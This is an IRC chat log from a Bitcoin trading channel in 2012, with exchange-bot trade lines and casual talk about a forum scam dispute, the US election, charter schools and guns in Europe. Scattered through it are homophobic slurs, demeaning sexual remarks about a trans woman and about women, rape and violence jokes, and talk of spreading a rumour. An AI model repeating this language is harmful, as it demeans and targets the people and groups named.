ok mircea i ordered a withdrawl Nov 06 17:18:12 it SHOULD be for 30 btc Nov 06 17:18:14 but if its for 300 btc Nov 06 17:18:16 let me know Nov 06 17:18:19 i gotta shower real quick Nov 06 17:20:20 [MPEX] [S.MPOE] 28867 @ 0.00047949 = 13.8414 BTC [-] Nov 06 17:20:39 just trying to make it difficult for the working man Nov 06 17:44:26 omfg i can't believe what a troll that joelkatz dood is. Nov 06 17:45:30 [MPEX] [S.MPOE] 4583 @ 0.00047949 = 2.1975 BTC [-] Nov 06 17:45:32 [MPEX] [S.MPOE] 22802 @ 0.00047948 = 10.9331 BTC [-] Nov 06 17:45:46 what's he saying Nov 06 17:45:50 and to who Nov 06 17:45:53 about whsat Nov 06 17:49:03 https://bitcointalk.org/index.php?topic=121915.40 Nov 06 17:49:17 basically he's arguing that patrickharnett shouldn't get a scammer tag in spite of stealing 5-600 btc from me Nov 06 17:49:25 because welll... ghe made a mistake. Nov 06 17:51:18 i shall borrow 1k btc from katz instead of 100 by mistake Nov 06 17:52:41 that forum you know ? it's incredible. Nov 06 17:52:55 people fuck them in the ass, they're all "o let's give them al ittle time" Nov 06 17:53:14 god forbid someone makes something actually useful : they won't comprehend it and then it's all OMG CP!!!1 Nov 06 17:53:46 btctalk was created by a government conspiracy to save on public spending. the idiots go there and post thus not being in the street causing damage. Nov 06 18:10:46 [MPEX] [S.MPOE] 12148 @ 0.00047948 = 5.8247 BTC [-] Nov 06 18:10:48 [MPEX] [S.MPOE] 9252 @ 0.00047941 = 4.4355 BTC [-] Nov 06 18:21:43 ;) https://cryptostocks.com/securities/25#info Nov 06 18:24:52 seems legit Nov 06 18:25:29 10k, is that the minimum to open an online brokerage acct ? Nov 06 18:25:46 i wonder how many people try to use bitcoin to get around those rules put there exactly so as to protect them from themselves. Nov 06 18:38:01 [MPEX] [S.MPOE] 26239 @ 0.00047941 = 12.5792 BTC [-] Nov 06 18:38:02 [MPEX] [S.MPOE] 326 @ 0.0004792 = 0.1562 BTC [-] Nov 06 19:03:11 [MPEX] [S.MPOE] 21600 @ 0.00047988 = 10.3654 BTC [+] Nov 06 19:14:40 rg: if you have good ideas, commits welcome it's up on github Nov 06 19:18:35 tell you what Nov 06 19:18:38 ill tell you the ideas Nov 06 19:18:39 you do them Nov 06 19:18:41 and take credit for it Nov 06 19:19:13 rg: but that involves me doing things Nov 06 19:19:32 and my doing things queue is long, and on hold until I get moved out Nov 06 19:22:03 you moving again ? Nov 06 19:22:33 mircea_popescu: havn't got my current one sorted yet, it's only been a few weeks Nov 06 19:22:39 havn't moved once yet ;) Nov 06 19:22:42 a pl Nov 06 19:22:44 a ok& Nov 06 19:29:06 [MPEX] [S.MPOE] 12627 @ 0.00047988 = 6.0594 BTC [+] Nov 06 19:29:07 [MPEX] [S.MPOE] 16749 @ 0.00048095 = 8.0554 BTC [+] Nov 06 19:29:09 [MPEX] [S.MPOE] 8824 @ 0.00048127 = 4.2467 BTC [+] Nov 06 19:35:48 [MPEX] [F.GIGA.ETF] 31933 @ 0.00003301 = 1.0541 BTC [-] Nov 06 19:42:21 JoalKatz can be all over the place Nov 06 19:42:30 i wonder if he is trolling at times Nov 06 19:44:38 it is the worst case of special pleading i ever saw Nov 06 19:47:24 he is off the wall on all sorts of things Nov 06 19:47:52 sometimes he makes rally good points, your case with patrick however makes him look like he is trolling Nov 06 19:48:17 he said i can cover, i can pay, then he didn't Nov 06 19:48:44 pirate isn't a scammer cause he thought zeek would pay Nov 06 19:50:54 http://trilema.com/2012/the-vault-story/ Nov 06 19:51:13 pigeons right. Nov 06 19:52:21 don't post more than 5 of those a week Nov 06 19:53:15 lol Nov 06 19:53:22 it's like 0.1 cents per omg Nov 06 19:53:24 DTCC had a vault aptly located on Water Street, in Manhattan. Nov 06 19:53:26 haha Nov 06 19:54:28 let me pay with bitcoins instead of this email thing Nov 06 19:54:39 https://bitcointalk.org/index.php?topic=121915.msg1320177#msg1320177 i do think this pretty much sums it up Nov 06 19:54:58 pigeons you only email to get a btc addy anyway! pm me, i'll sort it out privately Nov 06 20:00:51 [MPEX] [S.MPOE] 11600 @ 0.00048127 = 5.5827 BTC [+] Nov 06 20:10:11 mircea_popescu: I swear I don't have your cherries Nov 06 20:10:22 lol alikely story Nov 06 20:10:24 mr ponticherry Nov 06 20:10:40 But for a nice fee, I can found that god damn truck here in Argentina Nov 06 20:11:04 xD Nov 06 20:14:52 mircea_popescu: you think _anything_ (of value) will actually be lost if there is damage in that vault? Nov 06 20:15:08 wouldn't they have records of their inventory Nov 06 20:15:18 not really so much the point tho, is it ? Nov 06 20:15:35 haha rdponticelli can i pay in peaches ? Nov 06 20:15:43 and contracts which would require the physical thing to be remade in the event of damage Nov 06 20:15:58 (i mean, we're talking about paper, right?) Nov 06 20:16:04 there exist bearer instruments which are irreplaceable. Nov 06 20:16:19 so, depending on how many of those are reissuable or not, it will be a huge litigation mess to sort out. Nov 06 20:16:56 well, if things are really irreplaceable, i understand. Nov 06 20:17:03 Yeah, we should all go back to bartering things Nov 06 20:17:08 but here's the thing : this is really somewhat like glbse implosion Nov 06 20:17:18 lol, sotrue Nov 06 20:17:22 ppl will be tempted to just go... fuck yeah, im done. Nov 06 20:17:31 except, not for 1k btc. for 1trn usd Nov 06 20:18:28 damn, it's so tempting to just go fuckit, you can have your [insert asset here] when you have proof its yours Nov 06 20:18:38 ... until then, it's mine Nov 06 20:19:49 right. Nov 06 20:21:33 Maybe the whole Hurricane thing was crowdfunded by some evil issuers... Nov 06 20:22:24 Let's destroy the proof of our debt! Nov 06 20:23:08 Just like the towers Nov 06 20:23:54 hahaha Nov 06 20:24:47 u have it all wrong. it was caused by gay marriages Nov 06 20:25:06 jurov is luke-jr? Nov 06 20:26:04 [MPEX] [S.MPOE] 2000 @ 0.00047921 = 0.9584 BTC [-] Nov 06 20:26:05 [MPEX] [S.MPOE] 14900 @ 0.0004792 = 7.1401 BTC [-] Nov 06 20:26:09 no ?! Nov 06 20:26:53 Juraj Variny = jurov. luke's from the us iirc. Nov 06 20:26:58 why do you think so? Nov 06 20:28:45 simckles? Nov 06 20:28:53 smicklez? Nov 06 20:29:02 heh, joking based off of your gay comment Nov 06 20:32:00 okay. i'm interested now whether more people believe sandy was caused by haarp or so, or that it was caused by moral depravity Nov 06 20:32:15 i'm inclined to the latter Nov 06 20:32:51 it was caused by mircea's porn Nov 06 20:33:13 what, his fapping heated the upper atmosphere? Nov 06 20:34:07 more like the screams of those haunted girls reached the ear of Almighty Nov 06 20:34:41 sandy was caused by al gore Nov 06 20:35:00 so, anyone have any indication on how florida and new hampshire is going? Nov 06 20:35:02 my moral depornity. Nov 06 20:35:04 herpderp Nov 06 20:35:31 jurov jus' for you http://polimedia.us/dtng/c/src/135222570731.jpg Nov 06 20:35:48 that's some expert caning. Nov 06 20:38:05 hm, nice Nov 06 20:39:14 although, there's strong gender bias... no /y/ there? Nov 06 20:39:50 /y/ ? Nov 06 20:40:01 http://boards.4chan.org/y/ Nov 06 20:40:48 faggotry is evil. Nov 06 20:40:58 or, even better, bara. but that got kicked out even from 4chan :P Nov 06 20:41:40 whats that ? Nov 06 20:42:40 google "bara anime" Nov 06 20:43:09 wait, did mircea_popescu just call lesbians bad? Nov 06 20:43:25 faggots != lesbians Nov 06 20:43:26 :) Nov 06 20:43:35 Diablo-D3 faggotry is the unholy act of butthole buggery Nov 06 20:43:44 provided that butthole has a cock dongle Nov 06 20:43:58 ... Nov 06 20:44:06 ftfy: holiest act of butthole buggery Nov 06 20:44:24 lesbians jus wanna lick a little Nov 06 20:44:58 Diablo-D3 don't be calling me religious just cause you can't stand the shining light of truth Nov 06 20:45:25 mircea_popescu: I can call you religious for claiming what other people do is unholy Nov 06 20:45:32 it was a PUN Nov 06 20:45:56 lmao Nov 06 20:46:06 duh Nov 06 20:46:12 not a very good one. Nov 06 20:46:13 Diablo-D3 should be punished nao Nov 06 20:46:35 seriously, all I want is a woman who can cook and clean Nov 06 20:46:43 sadnwiches? Nov 06 20:46:53 SANVITCHES! OM NOM NOM NOM! Nov 06 20:47:05 sad nitches Nov 06 20:47:10 Diablo-D3, then it needs not to be a woman necessarily Nov 06 20:47:14 mircea is a spy! Nov 06 20:47:31 jurov women look better naked. Nov 06 20:47:42 yeah, lets face it, guys are ugly Nov 06 20:47:51 it depends Nov 06 20:48:05 Ive seen what are claimed "good looking guys" Nov 06 20:48:10 still ugly Nov 06 20:48:14 it's usually pictures of me. Nov 06 20:48:42 and japan tried solving it with bishounen guys Nov 06 20:48:55 and all they're doing is producing women with dicks and no tits Nov 06 20:49:17 you're hetero, so you're biased Nov 06 20:49:28 even if I was gay, I'd still like tits Nov 06 20:49:41 Diablo-D3 http://polimedia.us/dtng/c/res/750.html Nov 06 20:49:45 they're just so wonderful Nov 06 20:50:18 you're just fixated. Nov 06 20:50:21 mircea_popescu: bwhahahah Nov 06 20:50:25 op picture is lol Nov 06 20:50:31 >D Nov 06 20:51:08 [MPEX] [S.MPOE] 24013 @ 0.00048127 = 11.5567 BTC [+] Nov 06 20:51:08 Im going to have to say neither here, I think the tits are implants Nov 06 20:51:09 [MPEX] [S.MPOE] 17587 @ 0.00048224 = 8.4812 BTC [+] Nov 06 20:51:48 pfff. it says you can't say neither. Nov 06 20:51:59 and what's the problem with implants ? well done they're better than the real thing. Nov 06 20:52:18 meh, they never feel real =/ Nov 06 20:52:29 C) You become a Goat and you can Live for the next 10 years in the Goat tower HAHAHAHA Nov 06 20:52:47 Chaang-noi, you around? Nov 06 20:52:58 :D Nov 06 20:53:16 lol Nov 06 20:53:28 also, the mermaid one Nov 06 20:53:33 older than the intertubes Nov 06 20:53:47 mhm Nov 06 20:54:10 OOH Nov 06 20:54:13 WHO SHOULD YOU DATE Nov 06 20:54:15 older women damnit Nov 06 20:54:30 they've been around long enough to figure out exactly what they want and know how to get it out of you Nov 06 20:54:45 i tend to date a mix. Nov 06 20:54:54 shemales? Nov 06 20:55:02 mutts? Nov 06 20:55:08 haha no, cereal Nov 06 20:55:13 Diablo-D3: why would you think the trans woman's breasts are implants? Nov 06 20:55:31 kuzetsa: protip: its a photoshop Nov 06 20:55:32 kuzetsa cause they look good which makes him insecure Nov 06 20:55:44 so he feels the urge to lash out and diminish the woman Nov 06 20:55:53 typical rapist. Nov 06 20:55:56 lol Nov 06 20:56:02 says the king of rapists Nov 06 20:56:09 im not a rapist, i just beat 'em. Nov 06 20:56:10 mircea_popescu: and no, it doesnt make me insecure Nov 06 20:56:55 I mean, I dont get why the fuck _an image on the internet_ would make anyone insecure Nov 06 20:57:21 reptile brain Nov 06 20:58:22 yeah, so? if it turns you on, save it to your porn dir Nov 06 20:58:31 even though I'm not "a straight male", and my boyfriend is a trans guy, I'd almost certainly prefer "B" -- she's pretty hot as far as trans women go. Nov 06 20:59:04 <3 Nov 06 21:00:10 kuzetsa i agree. even her cock looks delicious Nov 06 21:00:16 and i'm about as straight as a coffin nail. Nov 06 21:00:18 om nom Nov 06 21:01:12 it seems joel is learning the perils of trying to outargue mpoe-pr Nov 06 21:05:48 mircea_popescu: for a sec I though that was buck angel. had to check the tattoos for comparison. Nov 06 21:06:31 lol useful tatoos Nov 06 21:06:57 :) Nov 06 21:16:12 "No you probably won't ever see any asset information. In fact the whole thing was probably a setup with one of the major asset holders on glbse so they would never have to pay back their investors" Nov 06 21:16:27 [MPEX] [S.MPOE] 9674 @ 0.0004792 = 4.6358 BTC [-] Nov 06 21:16:29 [MPEX] [S.MPOE] 37687 @ 0.00047918 = 18.0589 BTC [-] Nov 06 21:16:29 [MPEX] [S.MPOE] 21189 @ 0.00047874 = 10.144 BTC [-] Nov 06 21:17:28 yes i was going to slightly modify and spread that rumor, its a good one Nov 06 21:18:03 i wonder if it's the highest one could pile shit Nov 06 21:18:07 or it could be done higher. Nov 06 21:19:13 omg kuzetsa, BUTCH angel Nov 06 21:20:34 [MPEX] [S.MPOE] 7913 @ 0.00048224 = 3.816 BTC [+] Nov 06 21:20:35 [MPEX] [S.MPOE] 29450 @ 0.00048277 = 14.2176 BTC [+] Nov 06 21:20:37 [MPEX] [S.MPOE] 8900 @ 0.00048282 = 4.2971 BTC [+] Nov 06 21:20:38 [MPEX] [S.MPOE] 15141 @ 0.00048406 = 7.3292 BTC [+] Nov 06 21:20:39 [MPEX] [S.MPOE] 20150 @ 0.00048425 = 9.7576 BTC [+] Nov 06 21:20:40 [MPEX] [S.MPOE] 41200 @ 0.00048436 = 19.9556 BTC [+] Nov 06 21:20:41 [MPEX] [S.MPOE] 16300 @ 0.00048466 = 7.9 BTC [+] Nov 06 21:20:42 [MPEX] [S.MPOE] 27963 @ 0.00048547 = 13.5752 BTC [+] Nov 06 21:20:43 [MPEX] [S.MPOE] 56400 @ 0.00048556 = 27.3856 BTC [+] Nov 06 21:20:44 [MPEX] [S.MPOE] 21800 @ 0.00048625 = 10.6003 BTC [+] Nov 06 21:20:45 [MPEX] [S.MPOE] 49261 @ 0.00048793 = 24.0359 BTC [+] Nov 06 21:20:46 [MPEX] [S.MPOE] 38150 @ 0.00048817 = 18.6237 BTC [+] Nov 06 21:20:47 [MPEX] [S.MPOE] 30650 @ 0.00048878 = 14.9811 BTC [+] Nov 06 21:20:48 [MPEX] [S.MPOE] 38100 @ 0.00048994 = 18.6667 BTC [+] Nov 06 21:20:49 [MPEX] [S.MPOE] 28971 @ 0.00049012 = 14.1993 BTC [+] Nov 06 21:20:50 [MPEX] [S.MPOE] 45000 @ 0.00049015 = 22.0568 BTC [+] Nov 06 21:20:51 [MPEX] [S.MPOE] 29200 @ 0.00049024 = 14.315 BTC [+] Nov 06 21:20:51 and the moment we've all been waiting for.. Nov 06 21:20:52 [MPEX] [S.MPOE] 31400 @ 0.00049048 = 15.4011 BTC [+] Nov 06 21:20:52 [MPEX] [S.MPOE] 27438 @ 0.00049077 = 13.4657 BTC [+] Nov 06 21:20:53 [MPEX] [S.MPOE] 36300 @ 0.00049156 = 17.8436 BTC [+] Nov 06 21:20:54 [MPEX] [S.MPOE] 42700 @ 0.00049203 = 21.0097 BTC [+] Nov 06 21:20:55 [MPEX] [S.MPOE] 23300 @ 0.00049211 = 11.4662 BTC [+] Nov 06 21:20:56 [MPEX] [S.MPOE] 51558 @ 0.0004922 = 25.3768 BTC [+] Nov 06 21:20:57 [MPEX] [S.MPOE] 44191 @ 0.00049337 = 21.8025 BTC [+] Nov 06 21:20:58 [MPEX] [S.MPOE] 23600 @ 0.00049406 = 11.6598 BTC [+] Nov 06 21:20:59 [MPEX] [S.MPOE] 33000 @ 0.00049418 = 16.3079 BTC [+] Nov 06 21:21:00 [MPEX] [S.MPOE] 35000 @ 0.00049439 = 17.3037 BTC [+] Nov 06 21:21:01 [MPEX] [S.MPOE] 32150 @ 0.00049553 = 15.9313 BTC [+] Nov 06 21:21:01 [MPEX] [S.MPOE] 41354 @ 0.00049557 = 20.4938 BTC [+] Nov 06 21:21:02 [MPEX] [S.MPOE] 8678 @ 0.00049557 = 4.3006 BTC [+] Nov 06 21:21:03 [MPEX] [S.MPOE] 36807 @ 0.00049558 = 18.2408 BTC [+] Nov 06 21:21:05 [MPEX] [S.MPOE] 20400 @ 0.00049615 = 10.1215 BTC [+] Nov 06 21:21:06 [MPEX] [S.MPOE] 5919 @ 0.00049635 = 2.9379 BTC [+] Nov 06 21:21:07 [MPEX] [S.MPOE] 2804 @ 0.00049662 = 1.3925 BTC [+] Nov 06 21:21:08 [MPEX] [S.MPOE] 34366 @ 0.00049677 = 17.072 BTC [+] Nov 06 21:21:09 [MPEX] [S.MPOE] 18800 @ 0.00049685 = 9.3408 BTC [+] Nov 06 21:21:10 [MPEX] [S.MPOE] 55000 @ 0.0004971 = 27.3405 BTC [+] Nov 06 21:21:10 [MPEX] [S.MPOE] 21000 @ 0.00049715 = 10.4402 BTC [+] Nov 06 21:21:11 [MPEX] [S.MPOE] 29300 @ 0.00049719 = 14.5677 BTC [+] Nov 06 21:21:12 [MPEX] [S.MPOE] 45300 @ 0.00049727 = 22.5263 BTC [+] Nov 06 21:21:13 [MPEX] [S.MPOE] 42100 @ 0.00049745 = 20.9426 BTC [+] Nov 06 21:21:14 [MPEX] [S.MPOE] 47464 @ 0.00049794 = 23.6342 BTC [+] Nov 06 21:21:15 [MPEX] [S.MPOE] 32400 @ 0.00049796 = 16.1339 BTC [+] Nov 06 21:21:16 [MPEX] [S.MPOE] 8700 @ 0.00049813 = 4.3337 BTC [+] Nov 06 21:21:17 [MPEX] [S.MPOE] 7800 @ 0.00049816 = 3.8856 BTC [+] Nov 06 21:21:18 [MPEX] [S.MPOE] 17661 @ 0.00049876 = 8.8086 BTC [+] Nov 06 21:21:19 [MPEX] [S.MPOE] 21671 @ 0.00049891 = 10.8119 BTC [+] Nov 06 21:21:20 [MPEX] [S.MPOE] 43977 @ 0.00049975 = 21.9775 BTC [+] Nov 06 21:21:21 [MPEX] [S.MPOE] 73313 @ 0.0005 = 36.6565 BTC [+] Nov 06 21:21:58 yeah don't dare go past 0005 Nov 06 21:22:08 that's the magic barrier Nov 06 21:22:19 haha Nov 06 21:22:24 isn't that the min fee ? Nov 06 21:24:14 haha yeah Nov 06 21:47:20 [MPEX] [S.MPOE] 25400 @ 0.00049869 = 12.6667 BTC [-] Nov 06 22:12:36 [MPEX] [S.MPOE] 27860 @ 0.00049869 = 13.8935 BTC [-] Nov 06 22:21:05 [MPEX] [S.BVPS] 280 @ 0.0032 = 0.896 BTC [+] Nov 06 23:05:49 zhoutong resurfaced: http://news.ycombinator.com/item?id=4743455 Nov 06 23:08:34 old project tho neh ? Nov 06 23:08:55 This looks very cool Ryan - congrats on the launch! It's instantly appealing to me, and I fully understand the motivation. NameCheap, while an awesome domain name provider, still feels a bit "hackey" in their UI. It works, but it feels odd. This appeals to me more -- like Stripe for domain names. Nov 06 23:09:10 you have to be retarded to start competition for namecheap. srsly now. Nov 06 23:09:34 I'm going to be perfectly honest with you: The fact that you list that you're a one-man operation, that you're 18 years old, and that you say you "achieved financial independence at the age of 16" is a big turn-off to me. Nov 06 23:09:35 ahahahaa Nov 06 23:09:37 o god Nov 06 23:29:46 bah Nov 06 23:29:51 hab Nov 06 23:29:55 my papers got misplaced somehow Nov 06 23:30:01 I have to refile for my llc Nov 06 23:30:07 eh ?! Nov 06 23:30:20 yup Nov 06 23:30:30 I was wondering why it was taking so long Nov 06 23:30:47 can they even do that ?! Nov 06 23:31:07 lol, you mean you don't expect incompetence in the gov't? Nov 06 23:31:24 or you suspect they have it out for me Nov 06 23:33:06 romanian ppls wouldn't dare lol. Nov 06 23:33:40 well, i'll be successful and then move to romania then, since it's so much better Nov 06 23:33:48 haha Nov 06 23:33:57 civil law system alone sounds better than common law anyway Nov 06 23:34:32 possibly. Nov 06 23:34:47 mr. smickles Nov 06 23:34:53 did you vote yet? Nov 06 23:34:57 weeks ago Nov 06 23:35:02 lol Nov 06 23:36:36 did you vote? (assuming I correctly recall you saying you were 'merican) Nov 06 23:36:46 muriiica Nov 06 23:36:48 yea Nov 06 23:37:04 we had a amendement to allow charter schools Nov 06 23:37:08 [MPEX] [S.MPOE] 28004 @ 0.0005 = 14.002 BTC [+] Nov 06 23:37:09 [MPEX] [S.MPOE] 2396 @ 0.00050032 = 1.1988 BTC [+] Nov 06 23:37:13 Will you say which presidential candidate you voted for? Nov 06 23:37:33 really? charter schools were illegal where you are? Nov 06 23:38:25 mircea_popescu: is mail delivery done by the gov't in romainia? Nov 06 23:38:44 (aside from courier services) Nov 06 23:38:57 smickles well depends for what ? or what you mean ? Nov 06 23:39:03 basic letters Nov 06 23:39:11 i get monthly thanik you notes in the mail from the tax authority Nov 06 23:39:16 (my corp pays monthly payroll) Nov 06 23:39:35 o, you mean the post ? it's an autonomous thingee. like the uk mail or w/e Nov 06 23:40:11 i don't know how that is, I guess i'll research UK mail Nov 06 23:41:27 ah uk has gov't owned mail services too Nov 06 23:42:08 http://www.posta-romana.ro/posta-romana.html Nov 06 23:42:09 this is them Nov 06 23:42:55 ah, state owned as well Nov 06 23:43:09 sorta. it's a halfassed system Nov 06 23:43:20 i voted for obama. romney is a robot, or an android. he wants to cut science which is my swing issue. Nov 06 23:43:22 basically, much like a spunoff vehicle, govt doesn't want their debts on its books Nov 06 23:43:26 but wants to be able to say what's what. Nov 06 23:44:02 "Sovereign Mircea the Elder" Nov 06 23:44:30 also we have to charter for schools from within the board of education. a board member must raise it for voting. this amendment lets the local community raise it. Nov 06 23:44:31 lolwut thestringpuller you voted for obama? Nov 06 23:44:56 like any sane person Nov 06 23:45:00 lol Nov 06 23:45:07 who is romney? Nov 06 23:45:11 its either vote obama or vote jesus freak Nov 06 23:45:16 not at all Nov 06 23:45:17 LOl Nov 06 23:45:23 smickles voted for jesus? Nov 06 23:45:26 nope Nov 06 23:45:38 i would have voted 3rd party Nov 06 23:45:47 but oh well Nov 06 23:45:48 there are more than 3 choices you know Nov 06 23:46:00 not on our ballot Nov 06 23:46:05 unfortunately Nov 06 23:46:05 then dont vote Nov 06 23:46:06 really, that sucks Nov 06 23:46:12 ya Nov 06 23:46:23 the system is rigged anyways Nov 06 23:46:31 they don't actually count write-ins Nov 06 23:46:36 i voted.for the charter amendment Nov 06 23:46:52 i voted mainly to vote for the charter amendment Nov 06 23:46:53 I doubt the system is rigged, they don't need to Nov 06 23:47:03 too many people think is a 2 person choice Nov 06 23:47:08 thestringpuller: you like charter schools? Nov 06 23:47:13 well it's rigged because someone will win even though more of us didnt vote Nov 06 23:47:49 they allow kids in impoverished households to get a better education if their school is failing Nov 06 23:48:51 pigeons: you think not voting should carry weight somehow? Nov 06 23:48:55 conversely allowing schools to deny kids though right? Nov 06 23:49:09 its like free market for education Nov 06 23:49:14 yes. i think that they should all go home if enough people dont vote Nov 06 23:49:32 pigeons: does belgium have a notional gov't yet? Nov 06 23:49:46 been years now, hasn't it? Nov 06 23:49:49 i dont know, i'm not very cosmopolitan. but they make nice waffles Nov 06 23:50:02 then reform all the schools. if a school is failing the community should be allowed to reform it Nov 06 23:50:32 most charter schools that succeed were failing schools before they were "taken over" Nov 06 23:51:07 oh, seems they got one back in december Nov 06 23:52:11 dub: there is a free market for education. its called private school Nov 06 23:52:37 it's not really free market if you still have to pay for the public schools Nov 06 23:52:44 pigeons: you think not voting should carry weight somehow? <<< yes. simple majority or no elected official. Nov 06 23:52:55 if the candidate doesn't get 50%+ of all votes there's no president that term. Nov 06 23:52:59 thestringpuller: but in usa everyone is forced to pay for public school so if they use private school, they pay twice Nov 06 23:53:00 same for congress and all the way down Nov 06 23:53:03 yeah but don't charter schools make public schools into voluntary private ones? Nov 06 23:53:10 i think second place should be the VP Nov 06 23:53:12 and if congress doesn't manage to get simple majority of seats it sits idle. Nov 06 23:53:16 i like that mircea_popescu Nov 06 23:53:26 aye. it's how my tyranny shall work. Nov 06 23:53:43 yeah, sounds like an interesting system mp Nov 06 23:53:56 be like, lucky if you get a president every fifty years Nov 06 23:54:04 romania is plurality elections, isn't it? Nov 06 23:54:07 yea Nov 06 23:54:23 the local obama wannabe tried to create a disturbance oust the president Nov 06 23:54:34 got their asses handed to them in such grand manner it was funny Nov 06 23:54:58 (romania's extreme left is slightly right of the us gop) Nov 06 23:59:27 i would just have an emperor Nov 06 23:59:34 but assasinating him is legal Nov 07 00:03:28 [MPEX] [S.MPOE] 17395 @ 0.00049848 = 8.6711 BTC [-] Nov 07 00:03:30 [MPEX] [S.MPOE] 7505 @ 0.00049561 = 3.7196 BTC [-] Nov 07 00:05:56 mr. smickles, we should play monopoly Nov 07 00:06:05 when you have time tonight Nov 07 00:06:12 if* Nov 07 00:09:00 thestringpuller: will you be awake around 04:00 utc? Nov 07 00:10:34 mircea_popescu: if i move to romainia, will i have to be concerned with gun regulation. (assuming i am bringing guns into the country) Nov 07 00:10:49 there's no guns in yurp./ Nov 07 00:11:15 one can get a license Nov 07 00:11:17 leave your wild turkey at the border too Nov 07 00:11:19 not rly. Nov 07 00:11:28 my friend has it Nov 07 00:11:36 he owns several guns Nov 07 00:11:36 bah, I don't want to realize a gain on selling these things, then be taxed on it :P Nov 07 00:11:40 ya well, you can get a license for like, a daisy. Nov 07 00:11:41 also hunters can have that shit Nov 07 00:11:50 9mm Nov 07 00:11:52 or else, if you are employed as a guard in some very limited set of functions Nov 07 00:11:58 i dont care for that shit anyway Nov 07 00:12:09 policemen here aren't allowed to carry weapons Nov 07 00:12:13 they get the guns but no clips. Nov 07 00:12:14 but i live outside the city, plenty of hunters with guns here Nov 07 00:12:47 i know personally at least 5 Nov 07 00:13:13 kakobrekla: would http://en.wikipedia.org/wiki/Taurus_Judge be considered a hunting gun? Nov 07 00:13:44 smickles with a proper permit you can have a non hunting gun or whatever thats is called Nov 07 00:14:01 not here. Nov 07 00:14:09 what a silly gun Nov 07 00:14:31 ya srsly. Nov 07 00:14:40 dub: it's a fun gun Nov 07 00:14:58 what for? Nov 07 00:15:02 dub: so is this Nov 07 00:15:03 http://en.wikipedia.org/wiki/Smith_%26_Wesson_Model_686 Nov 07 00:15:15 to shoot Nov 07 00:15:17 smickles, mircea_popescu http://translate.google.com/translate?sl=sl&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Fwww.mnz.gov.si%2Fsi%2Fmnz_za_vas%2Fcivilno_orozje_in_eksplozivi%2Fcivilno_orozje%2F&act=url Nov 07 00:15:21 it's a fun gun to shoot Nov 07 00:15:35 fun to shoot Nov 07 00:15:50 shooting is for the purpose of the target dying Nov 07 00:16:04 preferably in a state that it can then be butchered and eaten Nov 07 00:16:19 Shot shells in .410 bore are not considered especially effective in personal defense Nov 07 00:16:21 end o story. Nov 07 00:16:26 get a DE. Nov 07 00:16:37 dub: well, the 686 i have once served as my sidearm in case a bear came after me Nov 07 00:16:42 iirc in slovakia you'll need tio pass psychiatric examination to get gun pass Nov 07 00:17:11 you hinting smix is unhinged ? :D Nov 07 00:17:17 that site says that its a permet to acquire a gun Nov 07 00:17:27 i have already acquire guns Nov 07 00:18:15 if its anything like here which is based on uk law iirc, you'll need a friendly holder of an importer/collector license to bring guns in Nov 07 00:18:24 heh, come on, launching things at high speeds, accurately, is one of the pennacles of human technology so far Nov 07 00:19:12 smickles seriously, the only way it's worth it to bother with guns in europe is if you're holding them illegaly Nov 07 00:19:17 firing a gun is like communion Nov 07 00:19:19 in which case it's not worth it to just hold them Nov 07 00:19:20 probably cheaper to leave your guns and buy new ones Nov 07 00:19:32 so unless you plan to start an assasination llc you're better off leaving them in storage in the us Nov 07 00:19:47 ...and protecting people from themselves is one of pinnacles of human civilization Nov 07 00:19:48 well, poo, Nov 07 00:19:54 is there nothing to hunt in europe? Nov 07 00:20:02 we do have bears Nov 07 00:20:05 for eating purposes Nov 07 00:20:14 one can eat a bear. Nov 07 00:20:20 is there a closer legal storage facility than 'merica to romania Nov 07 00:20:53 smickles also, http://en.wikipedia.org/wiki/IMI_Desert_Eagle Nov 07 00:21:01 what about turkey or something Nov 07 00:21:10 yes you can hunt, but you need a rifle for that Nov 07 00:21:12 maybe bosnia... i doubt they have an issue w/guns Nov 07 00:21:14 who hunts with a pistol Nov 07 00:21:23 jurov bosnia has an issue with mericans Nov 07 00:21:26 or wait, was that serbia Nov 07 00:21:30 I know a guy with a gold plated desert eagle Nov 07 00:21:35 mircea_popescu: depends how well you shoot :) Nov 07 00:21:51 smickles: might be an ace over 300m with that 5 shot thingy Nov 07 00:22:02 dub not really. a pistol isn't practically accurate at ya right lol Nov 07 00:22:15 that thing wouldn't fire straight over 100 yards if you lubed it with virgin tears. Nov 07 00:22:15 havent you seen bruce willis? Nov 07 00:22:49 two pistols aimed in different directions with pinpoint accuracy, easy Nov 07 00:22:52 dub: i prefer the 7 shot with a 6' barrel Nov 07 00:22:52 http://romaniantimes.at/news/General_News/2012-01-20/19322/Protest_against_wealthy_celebrities_hunting_wild_boar_in_Romania re hunting Nov 07 00:23:05 smickles: 400 utc it is Nov 07 00:23:12 :D Nov 07 00:23:46 mircea_popescu: i can hit a 10 inch target at 100 yards with my 686 Nov 07 00:23:57 a 10 inch target ? Nov 07 00:24:03 yup, no scope or anything Nov 07 00:24:05 dude, that's like... larger than a tit. Nov 07 00:24:09 just stand, aim, fire Nov 07 00:24:14 the point is to hit the nipple not the tit. Nov 07 00:24:34 yeah, but it's 100 yards with a hand gun Nov 07 00:24:39 which was my point Nov 07 00:24:47 pistols aren't made for that. Nov 07 00:24:47 mircea, you apply your stick proficience? Nov 07 00:24:57 jurov i'm an evil shot. Nov 07 00:25:17 i scored best in my military district, way above the instructors. Nov 07 00:25:27 wasn't even in the army. Nov 07 00:26:25 i don't recall how accurate i am with my riffle Nov 07 00:27:05 best i can say is that i hit squrrels in the head at a distance of 'really far away' Nov 07 00:27:15 haha works. Nov 07 00:27:35 what does squirrel taste like? Nov 07 00:27:40 and i almost don't miss clay pigeons with any shotgun i've fired Nov 07 00:27:56 smickles course the standard at the time was the ak Nov 07 00:27:56 dub: like squirrel? Nov 07 00:28:03 mmmm Nov 07 00:28:20 squirrel tastes like very small pork Nov 07 00:28:23 the're not much there, but it's meat, and it's nice to eat Nov 07 00:28:30 no it tastes like feathers Nov 07 00:28:38 urmom tastes like feathers Nov 07 00:29:19 if it tastes like feathers to you jurov either i cook it better, or i have no taste :D Nov 07 00:29:25 In some countries, prices for AKs are very low; in Somalia, Rwanda, Mozambique, Congo and Tanzania prices are between $30 and $125 per weapon, and prices have fallen in the last few decades due to mass counterfeiting. Nov 07 00:29:35 dude... $30 that's like... a blowjob. Nov 07 00:29:45 [MPEX] [S.MPOE] 17950 @ 0.0004994 = 8.9642 BTC [+] Nov 07 00:29:45 10 of them in asia. Nov 07 00:29:52 i'd buy one if i had the chance at 30 Nov 07 00:30:16 